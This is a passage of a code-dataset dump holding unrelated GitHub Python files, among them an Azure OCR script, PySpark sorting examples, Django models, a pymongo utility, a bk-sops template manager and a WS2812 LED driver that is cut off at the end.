a.finished\n","repo_name":"cciw-uk/cciw.co.uk","sub_path":"cciw/officers/tests/test_applicationform.py","file_name":"test_applicationform.py","file_ext":"py","file_size_in_byte":15408,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"18752723066","text":"from azure.ai.formrecognizer import FormRecognizerClient\r\nfrom azure.core.credentials import AzureKeyCredential\r\nimport csv\r\n\r\nclient = FormRecognizerClient(\r\n \"\",\r\n AzureKeyCredential(\"\")\r\n)\r\n\r\noutput = []\r\n\r\nwith open('prescription_1.jpg', 'rb') as f:\r\n form_rec = client.begin_recognize_content(form=f)\r\n\r\nresult = form_rec.result()\r\n\r\nfor idx, content in enumerate(result):\r\n for line_idx, line in enumerate(content.lines):\r\n for word in line.words:\r\n output.append((word.text,word.confidence))\r\n\r\nwith open(\"azure_presc_1.csv\",\"a\",newline=\"\") as f:\r\n writer = csv.writer(f)\r\n writer.writerows(output)\r\n\r\nprint(\"done\")\r\n\r\n\r\n\r\n\r\n ","repo_name":"shivmistry605/Prescription-Project","sub_path":"demo_azure.py","file_name":"demo_azure.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6575361961","text":"n = int(input())\nflat = False\na = []\n\nwhile 1:\n s = input().split()\n for i in range(len(s)):\n a.append(int(s[i]))\n if(len(a) == n):\n flat = True\n break\n if(flat):\n break\n \nb = []\nc = []\nfor i in range(n):\n if(a[i] % 2 == 0):\n b.append(a[i])\n else:\n c.append(a[i])\nb.sort()\nc.sort(reverse=True)\nx = 0\ny = 0\nfor i in range(n):\n if(a[i] % 2 == 0):\n print(b[x], end=' ')\n x+=1\n else:\n print(c[y], end=' ')\n y+=1","repo_name":"bakachanbaby/code_ptit","sub_path":"sap_xep_chan_le.py","file_name":"sap_xep_chan_le.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30484028154","text":"import threading\nimport typing\n\nclass Flask:\n def __init__(self, config:dict):\n self.title = config[\"name\"]\n self.S_ADDR = config[\"flask_address\"]\n self.app = config[\"flask_app\"]\n\n def run_server(self, port=80):\n t = threading.Thread(target=lambda: self.app.run(self.S_ADDR.strip(\"http://\"), port))\n t.start()","repo_name":"CordTech32/Positron","sub_path":"positron/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71876962088","text":"from typing import List\n\n\nclass Solution:\n def wordBreak(self, s: str, wordDict: List[str]) -> bool:\n response = False\n\n for word in wordDict:\n if s[:len(word)] == word:\n n = len(s) // len(word)\n while n >= 1:\n if len(word) * n == len(s) | response:\n return True\n response = response | self.wordBreak(s[len(word) * n:], wordDict)\n if response:\n return True\n n -= 1\n\n return response\n\n\nsolution = Solution()\nprint(solution.wordBreak(s = \"catskicatcats\", wordDict = [\"cats\",\"cat\",\"dog\",\"ski\"]))","repo_name":"nikpopesku/leetcode","sub_path":"python/100-199/139_word_break.py","file_name":"139_word_break.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36147540752","text":"import lib.definition as proc\nimport numpy as np\nimport pandas as pd\nimport itertools\nfrom lmfit import Model\nimport os, psutil\nimport gc\nimport multiprocessing as mp\nimport csv\nimport random as rand\nfrom scipy.stats import sem\nimport matplotlib.pyplot as plt\n\n\npath = \"/home/jlb1694/data/raw/opt/Run1.lh5\"\nwaves = proc.getWaves(path)\nwave = waves[1096][0:15000]\n\nenergy = 60\ntime = 60\nrise = 6\nflat = 0.8\n\n\nwf_sub = proc.sub_wave(wave[0:15000])\npulse, true_time = proc.get_pulse(energy, time, int(len(wave[0:15000])))\nwp = pulse + wf_sub\n \nw_trap, trap_energy, trap_time = proc.apply_trap(wp, rise, flat)\n\nm90 = trap_energy*0.9\nm10 = trap_energy*0.1\nm50 = trap_energy*0.5\nimax51 = proc.find_idx(wp, m50, trap_time)\nimax9 = proc.find_idxr(wp, m90, imax51)\nimax1 = proc.find_idx(wp, m10, imax51)\n \n \nrise_cal = imax9 - imax1\ndelT = abs(rise_cal - true_time)\n\nprint(delT)\nprint(true_time)\nprint(rise_cal)\nprint(trap_energy)\nprint(imax51)\nprint(trap_time)\n\nplt.plot(wp)\nplt.plot(w_trap)\nplt.axvline(imax51, color = 'g')\nplt.axvline(imax9, color = 'r')\nplt.axvline(imax1, color = 'b')\nplt.show()","repo_name":"jbrowni2/TimeEnergyStudy","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36719849077","text":"\"\"\"\nhttps://sparkbyexamples.com/pyspark/pyspark-orderby-and-sort-explained/\n\nhttps://github.com/spark-examples/pyspark-examples/blob/master/pyspark-orderby.py\n\n3 ways to sort\n\nsort()\n\norderBy()\n\nRawSQL\n\n\nDataFrame.sort() default ascending, support multiple column\n\nsame usage provide by DataFrame.orderBy()\n\nspecifically assgin ascending/decending\n\ndf.sort(df.department.asc() / .desc() )\n\nAlso support Raw SQL\n\n\"\"\"\n\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col, asc, desc\n\nspark = SparkSession.builder.appName(\"SparkByExamples.com\").getOrCreate()\n\nsimpleData = [\n (\"James\", \"Sales\", \"NY\", 90000, 34, 10000),\n (\"Michael\", \"Sales\", \"NY\", 86000, 56, 20000),\n (\"Robert\", \"Sales\", \"CA\", 81000, 30, 23000),\n (\"Maria\", \"Finance\", \"CA\", 90000, 24, 23000),\n (\"Raman\", \"Finance\", \"CA\", 99000, 40, 24000),\n (\"Scott\", \"Finance\", \"NY\", 83000, 36, 19000),\n (\"Jen\", \"Finance\", \"NY\", 79000, 53, 15000),\n (\"Jeff\", \"Marketing\", \"CA\", 80000, 25, 18000),\n (\"Kumar\", \"Marketing\", \"NY\", 91000, 50, 21000),\n]\ncolumns = [\"employee_name\", \"department\", \"state\", \"salary\", \"age\", \"bonus\"]\n\ndf = spark.createDataFrame(data=simpleData, schema=columns)\n\ndf.printSchema()\ndf.show(truncate=False)\n\ndf.sort(\"department\", \"state\").show(truncate=False)\ndf.sort(col(\"department\"), col(\"state\")).show(truncate=False)\n\ndf.orderBy(\"department\", \"state\").show(truncate=False)\ndf.orderBy(col(\"department\"), col(\"state\")).show(truncate=False)\n\n# assign ascending or descending\ndf.sort(df.department.asc(), df.state.asc()).show(truncate=False)\ndf.sort(col(\"department\").asc(), col(\"state\").asc()).show(truncate=False)\ndf.orderBy(col(\"department\").asc(), col(\"state\").asc()).show(truncate=False)\n\ndf.sort(df.department.asc(), df.state.desc()).show(truncate=False)\ndf.sort(col(\"department\").asc(), col(\"state\").desc()).show(truncate=False)\ndf.orderBy(col(\"department\").asc(), col(\"state\").desc()).show(truncate=False)\n\n\ndf.createOrReplaceTempView(\"EMP\")\ndf.select(\n \"employee_name\", asc(\"department\"), desc(\"state\"), \"salary\", \"age\", \"bonus\"\n).show(truncate=False)\n\nspark.sql(\n \"select employee_name,department,state,salary,age,bonus from EMP ORDER BY department asc\"\n).show(truncate=False)\n","repo_name":"YLTsai0609/pyspark_101","sub_path":"d013_orderby_vs_sort.py","file_name":"d013_orderby_vs_sort.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"40761434089","text":"import datetime\n\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.contrib import admin\n\n\nclass Participant(models.Model):\n participant_name = models.CharField('Jméno', max_length=50)\n\n def __str__(self):\n return self.participant_name\n\n class Meta:\n verbose_name_plural = \"Účastníci\"\n\n\nclass Tag(models.Model):\n tag_title = models.CharField('Tag', max_length=30)\n\n def __str__(self):\n return self.tag_title\n\n class Meta:\n verbose_name_plural = \"Tagy\"\n\n\nclass Type(models.Model):\n type_of_record = models.CharField(max_length=50)\n\n def __str__(self):\n return self.type_of_record\n\n class Meta:\n verbose_name_plural = \"Typy\"\n\n\nclass Record(models.Model):\n title = models.CharField('Název', max_length=150)\n pub_date = models.DateTimeField('Vloženo')\n start_date = models.DateField('Začátek')\n end_date = models.DateField('Konec')\n milestone = models.CharField('Milník', max_length=150)\n description = models.CharField('Popis', max_length=1000)\n type = models.ForeignKey(Type, on_delete=models.SET_NULL, null=True, verbose_name=\"Typ\")\n participants = models.ManyToManyField(Participant, verbose_name=\"Účastníci\")\n tags = models.ManyToManyField(Tag, verbose_name=\"Tagy\")\n\n def __init__(self, *args, **kwargs):\n super(Record, self).__init__(*args, **kwargs)\n\n def __str__(self):\n\n return self.title\n\n class Meta:\n verbose_name_plural = \"Záznamy\"\n\n @admin.display(\n boolean=True,\n ordering='pub_date',\n description='Publikováno nedávno?',\n )\n def was_published_recently(self):\n now = timezone.now()\n return now - datetime.timedelta(days=7) <= self.pub_date <= now\n\n\n","repo_name":"OndraPavlovic/web_app-Chronicle","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2656610356","text":"import threading\nimport time\nimport pyttsx3\nfrom numpy import char\nimport multiprocessing\nimport os\nevent = multiprocessing.Event()\ncount = 0\ndef lighter(q):\n\n#flag=True: 青信号\n#flag=False: 赤信号\n\n global count\n #event.set() # 初期値は青信号\n q.put(False)\n while True:\n\n \n count += 1\n print(count)\n check(q)\n time.sleep(1)\n\n\ndef check():\n global count\n if 5 10:\n #event.set() #青信号\n #car2.start()\n count = 0\n return True\n else:\n print(\"\\33[42;1m青信号...\\033[0m\")\n return True\n \n\n\n #time.sleep(1)\n\n\ndef car():\n engine = pyttsx3.init()\n #rate デフォルト値は200\n rate = engine.getProperty('rate')\n engine.setProperty('rate',300)\n\n #volume デフォルト値は1.0、設定は0.0~1.0\n volume = engine.getProperty('volume')\n engine.setProperty('volume',1.0)\n while True:\n st = q.get()\n if st == True:\n p2 = multiprocessing.Process(target=sayfunc,args=(\"とまれとまれとまれとまれとまれとまれとまれとまれとまれとまれとまれ\",))\n p2.start()\n else:\n p2 = multiprocessing.Process(target=sayfunc,args=(\"すすめ\",))\n p2.start()\n print(\"赤から青\")\n print(st)\n time.sleep(1)\n engine.say(name)\n engine.runAndWait()\n \n #engine.endLoop()\n\ndef sayfunc(q,ph):\n engine = q.get()\n #engine = pyttsx3.init()\n #rate デフォルト値は200\n engine.say(ph)\n engine.runAndWait()\n q.put(False)\n\n\ndef say(ph):\n engine = pyttsx3.init()\n #rate デフォルト値は200\n rate = engine.getProperty('rate')\n engine.setProperty('rate',200)\n volume = engine.getProperty('volume')\n engine.setProperty('volume',1.0)\n engine.say(ph)\n engine.runAndWait()\n\n\nif __name__ == '__main__':\n q = multiprocessing.Queue()\n engine = pyttsx3.init()\n #engine = pyttsx3.init()\n #rate デフォルト値は200\n rate = engine.getProperty('rate')\n engine.setProperty('rate',300)\n volume = engine.getProperty('volume')\n engine.setProperty('volume',3.0)\n #rate デフォルト値は200\n q.put(engine)\n while True:\n count +=1\n print(count)\n judge = check()\n \n \n if judge == True:\n st = q.get()\n print(st)\n #print(len(q))\n if st == engine:\n engine.stop()\n voice1.terminate()\n voice1 = multiprocessing.Process(target=sayfunc,args=(q,\"あの客はよく柿食う客だ\"))\n voice1.start()\n q.put(engine)\n else:\n st = q.get()\n if st == engine:\n engine.stop()\n voice1.terminate()\n \n voice1 = multiprocessing.Process(target=sayfunc,args=(q,\"go\"))\n voice1.start()\n q.put(engine)\n time.sleep(2)\n#car = threading.Thread(target=car, args=(\"MINI\",))\n#car.start()","repo_name":"Naoya-Tagawa/3dprinter_visual_impaired","sub_path":"ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11852991429","text":"# Author: Nima Daryabar\n# Making a database using pymongo\nfrom pymongo import MongoClient\nimport re\n\nfrom src.validation.regcheck import check_only_letters\nfrom src.validation.regcheck import digit_check\n\n\n# Show databases list\n# db_client: client from connect_db()\n# db_list: list of databases as return value\ndef db_list(db_client):\n print(\"\\ndatabases list:\\n\")\n db_list = db_client.list_database_names() # Get list of databases\n\n # Check if collection list is empty or not to show it to the user\n if not db_list: # if no database\n print(\"\\n-> There is no database to show!\")\n else:\n for counter, dbname in enumerate(db_list, 1):\n print(counter, '.', dbname)\n return db_list\n\n\n# Create new datbase\n# dbls_list: database list from connect_db()\n# dbls_client: client from connect_db()\ndef create_db(dbls_list, dbls_client):\n is_new_db = True # True if new db is created\n while True: # Check if name exists or not\n\n # Getting database name from user\n while True: # Check if name is only letters\n db_name_user = input('\\nGive a database name to create one: ')\n\n # check if name is only letters\n if check_only_letters(db_name_user): # if True\n break\n else:\n print(\"\\n -> only letters is allowed\")\n\n \n if db_name_user in dbls_list: # if database name is in the list\n print(\"\\n-> The database is already created! Enter New name plz!\")\n\n else: # if database name is not in the list\n created_db = dbls_client[db_name_user] # Create database\n print(\"\\nDatabase is created\")\n break \n return created_db, is_new_db\n\n\n# Choose one database from databases list\n# rdb_db_list: database list from connect_db()\n# rdb_client: client from connect_db()\ndef retrieve_db(rdb_client, rdb_db_list):\n while True: # Check if user enters correct number\n\n # Check and get user's given number\n print(\"\\nEnter database list number:\", end=' ')\n db_list_num = digit_check()\n \n # Check if number is in the range of db_list length\n if db_list_num == 0:\n print(\"Wrong number! again plz!\")\n continue\n if db_list_num in range((len(rdb_db_list)+1)): # if number is in the range\n break # break from loop\n else:\n print(\"Wrong number! plz enter a number in a range of 1 to \", len(rdb_db_list))\n \n print(rdb_db_list[(db_list_num-1)]) # show choosen database from list\n choosen_db = rdb_db_list[(db_list_num-1)] # choose from database list\n retrieved_db = rdb_client[choosen_db] # return and store choosen database \n return retrieved_db\n\n\n# Connecting to the database\ndef connect_db():\n client = MongoClient('localhost', 27017) # Running Mongod instance\n database_list = db_list(client) # Show databases list\n\n # Turn to True if user makes a new database\n new_db = False\n\n # Check if there is any db in db_list to make a new database or not\n if not database_list: # if no database in database list\n print(\"\\nCreate a database to continue\")\n db, new_db = create_db(database_list, client) # Create a new database\n\n else: # if there is db in database list\n while True: # Ask to make a new database or use one from the list\n answer_new_or_list = input(\"\\nMaking new datbase(n) or Using one from list(l) - (n/l): \")\n \n if answer_new_or_list == 'n': # Making a new databse\n db, new_db = create_db(database_list, client) # Create new database\n break\n \n elif answer_new_or_list == 'l': # Using db from old databases in the list\n db = retrieve_db(client, database_list) # Choose one from db list\n break\n\n \n else: # Wrong answer to the question\n print(\"\\n*Wrong answer, Enter again plz!\")\n return db, new_db\n\n\nif __name__ == \"__main__\":\n conn = connect_db()\n","repo_name":"nimad70/Infostorage","sub_path":"src/database/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26525940637","text":"import traceback\n\nfrom pipeline.exceptions import PipelineException\n\nfrom gcloud.constants import TEMPLATE_NODE_NAME_MAX_LENGTH\nfrom gcloud.template_base.utils import replace_template_id\nfrom gcloud.utils.strings import standardize_name, standardize_pipeline_node_name\n\nfrom pipeline.models import PipelineTemplate, TemplateRelationship\nfrom pipeline_web.core.models import NodeInTemplate\nfrom pipeline_web.parser.validator import validate_web_pipeline_tree\nfrom pipeline_web.parser.clean import PipelineWebTreeCleaner\nfrom django.utils.translation import ugettext_lazy as _\nimport logging\n\nlogger = logging.getLogger(\"root\")\n\n\nclass TemplateManager:\n def __init__(self, template_model_cls):\n self.template_model_cls = template_model_cls\n\n def create_pipeline(self, name: str, creator: str, pipeline_tree: dict, description: str = \"\",) -> dict:\n \"\"\"\n 创建 pipeline 层模板\n\n :param name: 模板名\n :type name: str\n :param creator: 创建者\n :type creator: str\n :param pipeline_tree: 模板数据\n :type pipeline_tree: dict\n :param description: 模板描述, defaults to \"\"\n :type description: str, optional\n :return: [description]\n :rtype: dict\n \"\"\"\n name = standardize_name(name, TEMPLATE_NODE_NAME_MAX_LENGTH)\n standardize_pipeline_node_name(pipeline_tree)\n\n try:\n validate_web_pipeline_tree(pipeline_tree)\n except PipelineException as e:\n message = _(f\"保存流程失败: 流程树合法性校验失败, 请检查流程. 失败原因: {e} | create_pipeline\")\n logger.error(message)\n return {\n \"result\": False,\n \"data\": None,\n \"message\": message,\n \"verbose_message\": _(f\"保存流程失败: 流程树合法性校验失败, 请检查流程. 失败原因: {traceback.format_exc()} | create_pipeline\"),\n }\n\n create_template_kwargs = {\n \"name\": name,\n \"creator\": creator,\n \"pipeline_tree\": pipeline_tree,\n \"description\": description,\n }\n try:\n pipeline_template = self.template_model_cls.objects.create_pipeline_template(**create_template_kwargs)\n except Exception as e:\n message = _(f\"保存流程失败: 创建Pipeline流程失败, 请检查流程. 创建参数[{create_template_kwargs}], 失败原因: [{e}] | create_pipeline\")\n logger.error(message)\n return {\n \"result\": False,\n \"data\": None,\n \"message\": message,\n \"verbose_message\": _(\n f\"保存流程失败: 创建Pipeline流程失败, 请检查流程. \"\n f\"创建参数[{create_template_kwargs}], 失败原因: [{traceback.format_exc()}] | create_pipeline\"\n ),\n }\n\n return {\"result\": True, \"data\": pipeline_template, \"message\": \"success\", \"verbose_message\": \"success\"}\n\n def create(\n self, name: str, creator: str, pipeline_tree: dict, template_kwargs: dict, description: str = \"\",\n ) -> dict:\n \"\"\"\n 创建 template 层模板\n\n :param name: 模板名\n :type name: str\n :param creator: 创建者\n :type creator: str\n :param pipeline_tree: 模板数据\n :type pipeline_tree: dict\n :param template_kwargs: template 层参数\n :type template_kwargs: dict\n :param description: 描述, defaults to \"\"\n :type description: str, optional\n :return: [description]\n :rtype: dict\n \"\"\"\n create_result = self.create_pipeline(\n name=name, creator=creator, pipeline_tree=pipeline_tree, description=description\n )\n if not create_result[\"result\"]:\n return create_result\n\n template_kwargs[\"pipeline_template_id\"] = create_result[\"data\"].template_id\n try:\n template = self.template_model_cls.objects.create(**template_kwargs)\n except Exception as e:\n message = _(f\"保存流程失败: 创建模板失败, 请检查流程. 创建参数[{template_kwargs}], 失败原因: [{e}] | create\")\n logger.error(message)\n return {\n \"result\": False,\n \"data\": None,\n \"message\": message,\n \"verbose_message\": _(\n f\"保存流程失败: 创建模板失败, 请检查流程. 创建参数[{template_kwargs}], 失败原因: [{traceback.format_exc()}] | create\"\n ),\n }\n\n return {\"result\": True, \"data\": template, \"message\": \"success\", \"verbose_message\": \"success\"}\n\n def update_pipeline(\n self,\n pipeline_template: PipelineTemplate,\n editor: str,\n name: str = \"\",\n pipeline_tree: str = None,\n description: str = \"\",\n ) -> dict:\n \"\"\"\n 更新 pipeline 层模板\n\n :param pipeline_template: pipeline 模板对象\n :type pipeline_template: PipelineTemplate\n :param editor: 编辑者\n :type editor: str\n :param name: 模板名, defaults to \"\"\n :type name: str, optional\n :param pipeline_tree: 模板结构, defaults to None\n :type pipeline_tree: str, optional\n :param description: 模板描述, defaults to \"\"\n :type description: str, optional\n :return: [description]\n :rtype: dict\n \"\"\"\n update_kwargs = {\"editor\": editor}\n if name:\n update_kwargs[\"name\"] = standardize_name(name, TEMPLATE_NODE_NAME_MAX_LENGTH)\n\n if description:\n update_kwargs[\"description\"] = description\n\n if pipeline_tree:\n standardize_pipeline_node_name(pipeline_tree)\n try:\n validate_web_pipeline_tree(pipeline_tree)\n except PipelineException as e:\n message = _(f\"保存流程失败: 流程树合法性校验失败, 请检查流程. 失败原因: {e} | update_pipeline\")\n logger.error(message)\n return {\n \"result\": False,\n \"data\": None,\n \"message\": message,\n \"verbose_message\": _(\n f\"保存流程失败: 流程树合法性校验失败, 请检查流程. 失败原因: {traceback.format_exc()} | update_pipeline\"\n ),\n }\n\n replace_template_id(self.template_model_cls, pipeline_tree)\n\n pipeline_web_tree = PipelineWebTreeCleaner(pipeline_tree)\n pipeline_web_tree.clean()\n update_kwargs[\"structure_data\"] = pipeline_tree\n\n try:\n pipeline_template.update_template(**update_kwargs)\n except Exception as e:\n message = _(f\"更新流程失败: 更新Pipeline失败, 请检查流程. 更新参数: [{update_kwargs}], 失败原因: [{e}] | update_pipeline\")\n logger.error(message)\n return {\n \"result\": False,\n \"data\": None,\n \"message\": message,\n \"verbose_message\": _(\n f\"更新流程失败: 更新Pipeline失败, 请检查流程. 更新参数: [{update_kwargs}], 失败原因: [{traceback.format_exc()}\"\n ),\n }\n\n # create node in template\n NodeInTemplate.objects.update_nodes_in_template(pipeline_template, pipeline_web_tree.origin_data)\n else:\n for k, v in update_kwargs.items():\n setattr(pipeline_template, k, v)\n pipeline_template.save()\n\n return {\"result\": True, \"data\": pipeline_template, \"message\": \"success\", \"verbose_message\": \"success\"}\n\n def update(\n self, template: object, editor: str, name: str = \"\", pipeline_tree: str = None, description: str = \"\",\n ) -> dict:\n \"\"\"\n 更新 template 层模板\n\n :param template: template 对象\n :type template: object\n :param editor: 编辑者\n :type editor: str\n :param name: 模板名, defaults to \"\"\n :type name: str, optional\n :param pipeline_tree: 模板结构, defaults to None\n :type pipeline_tree: str, optional\n :param description: 模板描述, defaults to \"\"\n :type description: str, optional\n :return: [description]\n :rtype: dict\n \"\"\"\n data = self.update_pipeline(\n pipeline_template=template.pipeline_template,\n editor=editor,\n name=name,\n pipeline_tree=pipeline_tree,\n description=description,\n )\n if not data[\"result\"]:\n return data\n\n data[\"data\"] = template\n return data\n\n def can_delete(self, template: object) -> (bool, str):\n \"\"\"\n 检测 template 是否能够删除\n\n :param self: [description]\n :type self: [type]\n :param str: [description]\n :type str: [type]\n :return: [description]\n :rtype: [type]\n \"\"\"\n referencer = template.referencer()\n if referencer:\n message = _(\n \"流程删除失败: 流程已被其他流程引用[{}], 暂不可删除, 请处理后重试 | can_delete\".format(\n \",\".join([f'{item[\"template_type\"]}:{item[\"id\"]}:{item[\"name\"]}' for item in referencer])\n )\n )\n logger.error(message)\n return (\n False,\n message,\n )\n\n appmaker_referencer = template.referencer_appmaker()\n if appmaker_referencer:\n message = _(\n \"流程删除失败: 流程已被其他轻应用引用[{}], 暂不可删除, 请处理后重试 | can_delete\".format(\n \",\".join([f'{item[\"id\"]}:{item[\"name\"]}' for item in appmaker_referencer])\n )\n )\n logger.error(message)\n return (\n False,\n message,\n )\n\n clocked_task_referencer = template.referencer_clocked_task()\n if clocked_task_referencer:\n message = _(\n \"流程删除失败: 流程已被其他计划任务引用[{}], 暂不可删除, 请处理后重试 | can_delete\".format(\n \",\".join([f'{item[\"id\"]}:{item[\"name\"]}' for item in clocked_task_referencer])\n )\n )\n logger.error(message)\n return (\n False,\n message,\n )\n\n periodic_task_referencer = template.referencer_periodic_task()\n if periodic_task_referencer:\n message = _(\n \"流程删除失败: 流程已被其他周期任务引用[{}], 暂不可删除, 请处理后重试 | can_delete\".format(\n \",\".join([f'{item[\"id\"]}:{item[\"name\"]}' for item in periodic_task_referencer])\n )\n )\n logger.error(message)\n return (\n False,\n message,\n )\n\n return True, \"\"\n\n def delete(self, template: object) -> dict:\n \"\"\"\n 删除某个 template\n\n :param template: template 对象\n :type template: object\n :return: [description]\n :rtype: dict\n \"\"\"\n can_delete, message = self.can_delete(template)\n if not can_delete:\n return {\"result\": False, \"data\": None, \"message\": message, \"verbose_message\": message}\n\n self.template_model_cls.objects.filter(id=template.id).update(is_deleted=True)\n return {\"result\": True, \"data\": template, \"message\": \"success\", \"verbose_message\": \"success\"}\n\n def batch_delete(self, template_ids: list) -> dict:\n \"\"\"\n 批量删除 template\n\n :param template_ids: template id列表\n :type: list\n :return: [description]\n :rtype: dict\n \"\"\"\n templates = self.template_model_cls.objects.select_related(\"pipeline_template\").filter(id__in=template_ids)\n delete_list = []\n not_delete_list = []\n delete_pipeline_template_id_list = []\n references = {}\n for template in templates:\n referencer = template.referencer()\n referencer = [item for item in referencer if item[\"id\"] not in template_ids]\n if referencer:\n references.setdefault(template.id, {}).setdefault(\"template\", []).extend(referencer)\n appmaker_referencer = template.referencer_appmaker()\n if appmaker_referencer:\n references.setdefault(template.id, {}).setdefault(\"appmaker\", []).extend(appmaker_referencer)\n clocked_task_referencer = template.referencer_clocked_task()\n if clocked_task_referencer:\n references.setdefault(template.id, {}).setdefault(\"clocked_task\", []).extend(clocked_task_referencer)\n periodic_task_referencer = template.referencer_periodic_task()\n if periodic_task_referencer:\n references.setdefault(template.id, {}).setdefault(\"periodic_task\", []).extend(periodic_task_referencer)\n if referencer or appmaker_referencer or clocked_task_referencer or periodic_task_referencer:\n not_delete_list.append(template.id)\n else:\n delete_pipeline_template_id_list.append(template.pipeline_template.template_id)\n delete_list.append(template.id)\n\n # 删除该流程引用的子流程节点的执行方案\n relation_queryset = TemplateRelationship.objects.filter(\n ancestor_template_id__in=delete_pipeline_template_id_list\n )\n for relation in relation_queryset:\n relation.templatescheme_set.clear()\n\n self.template_model_cls.objects.filter(id__in=delete_list).update(is_deleted=True)\n return {\n \"result\": True,\n \"data\": {\"success\": delete_list, \"fail\": not_delete_list, \"references\": references},\n \"message\": \"\",\n }\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/template_base/domains/template_manager.py","file_name":"template_manager.py","file_ext":"py","file_size_in_byte":14106,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"17073224194","text":"# Example using PIO to drive a set of WS2812 LEDs.\r\n\r\nimport array, time\r\nfrom machine import Pin, UART\r\nimport rp2\r\n\r\n# Configure the number of WS2812 LEDs.\r\nNUM_LEDS = 13\r\nPIN_NUM = 7\r\nbrightness = 1.0\r\nseparator = [5, 4, 3, 1]\r\nuart = UART(0, baudrate=9600, tx=Pin(16), rx=Pin(17), timeout=10)\r\nrxData = bytes()\r\nFILTER = [b'0', b'1', b'2', b'3', b'4', b'5', b'6', b'7', b'8', b'9']\r\n\r\n@rp2.asm_pio(sideset_init=rp2.PIO.OUT_LOW, out_shiftdir=rp2.PIO.SHIFT_LEFT, autopull=True, pull_thresh=24)\r\ndef ws2812():\r\n T1 = 2\r\n T2 = 5\r\n T3 = 3\r\n wrap_target()\r\n label(\"bitloop\")\r\n out(x, 1) .side(0) [T3 - 1]\r\n jmp(not_x, \"do_zero\") .side(1) [T1 - 1]\r\n jmp(\"bitloop\") .side(1) [T2 - 1]\r\n label(\"do_zero\")\r\n nop() .side(0) [T2 - 1]\r\n wrap()\r\n\r\n\r\n# Create the StateMachine with the ws2812 program, outputting on pin\r\nsm = rp2.StateMachine(0, ws2812, freq=8_000_000, sideset_base=Pin(PIN_NUM))\r\n\r\n# Start the StateMachine, it will wait for data on its FIFO.\r\nsm.active(1)\r\n\r\n# Display a pattern on the LEDs via an array of LED RGB values.\r\nar = array.array(\"I\", [0 for _ in range(NUM_LEDS)])\r\n\r\n##########################################################################\r\ndef pixels_show():\r\n dimmer_ar = array.array(\"I\", [0 for _ in range(NUM_LEDS)])\r\n for i,c in enumerate(ar):\r\n r = int(((c >> 8) & 0xFF) * brightness)\r\n g = int(((c >> 16) & 0xFF) * brightness)\r\n b = int((c & 0xFF) * brightness)\r\n dimmer_ar[i] = (g<<16) + (r<<8) + b\r\n sm.put(dimmer_ar, 8)\r\n\r\ndef pixels_set(i, color):\r\n ar[i] = (color[1]<<16) + (color[0]<<8) + color[2]\r\n\r\ndef pixels_fill(color):\r\n for i in range(len(ar)):\r\n pixels_set(i, color)\r\n\r\ndef color_chase(color, wait):\r\n for i in range(NUM_LEDS):\r\n pixels_set(i, color)\r\n time.sleep(wait)\r\n pixels_show()\r\n time.sleep(0.2)\r\n \r\ndef wheel(pos):\r\n # Input a value 0 to 255 to get a color value.\r\n # The colours are a transition r - g - b - back to r.\r\n if pos < 0 or pos > 255:\r\n return (0, 0, 0)\r\n if pos < 85:\r\n return (255 - pos * 3, pos * 3, 0)\r\n if pos < 170:\r\n pos -= 85\r\n return (0, 255 - pos * 3, pos * 3)\r\n pos -= 170\r\n return (pos * 3, 0, 255 - pos * 3)\r\n \r\n \r\ndef rainbow_cycle(wait):\r\n for j in range(255):\r\n for i in range(NUM_LEDS):\r\n rc_index = (i * 256 // NUM_LEDS) + j\r\n pixels_set(i, wheel(rc_index & 255))\r\n pixels_show()\r\n time.sleep(wait)\r\n\r\ndef light_up_sections(separator, direction, color):\r\n if direction == 0:\r\n start_index = 0\r\n for section_length in separator:\r\n end_index = start_index + section_length\r\n for i in range(start_index, end_index):\r\n pixels_set(i, color)\r\n pixels_show()\r\n\r\n time.sleep_ms(80)\r\n\r\n for i in range(start_index, end_index):\r\n pixels_set(i, BLACK)\r\n pixels_show()\r\n\r\n start_index = end_index\r\n elif direction == 1:\r\n start_index = NUM_LEDS\r\n for section_length in reversed(separator):\r\n start_index -= section_length\r\n end_index = start_index + section_length\r\n for i in range(start_index, end_index):\r\n pixels_set(i, color)\r\n pixels_show()\r\n\r\n time.sleep_ms(80)\r\n\r\n for i in range(start_index, end_index):\r\n pixels_set(i, BLACK)\r\n pixels_show()\r\n\r\nWHITE = (255, 255, 255)\r\nGREEN = (136, 0, 0)\r\nRED = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nPURPLE = (128, 0, 128)\r\nPINK = (255, 192, 203)\r\nYELLOW = (255, 255, 0)\r\nORANGE = (255, 165, 0)\r\nCYAN = (0, 156, 209)\r\nLIME = (0, 255, 0)\r\nGRAY = (136, 136, 136)\r\nBLACK = (0, 0, 0)\r\n\r\n# 0 White others\r\n# 1 Red 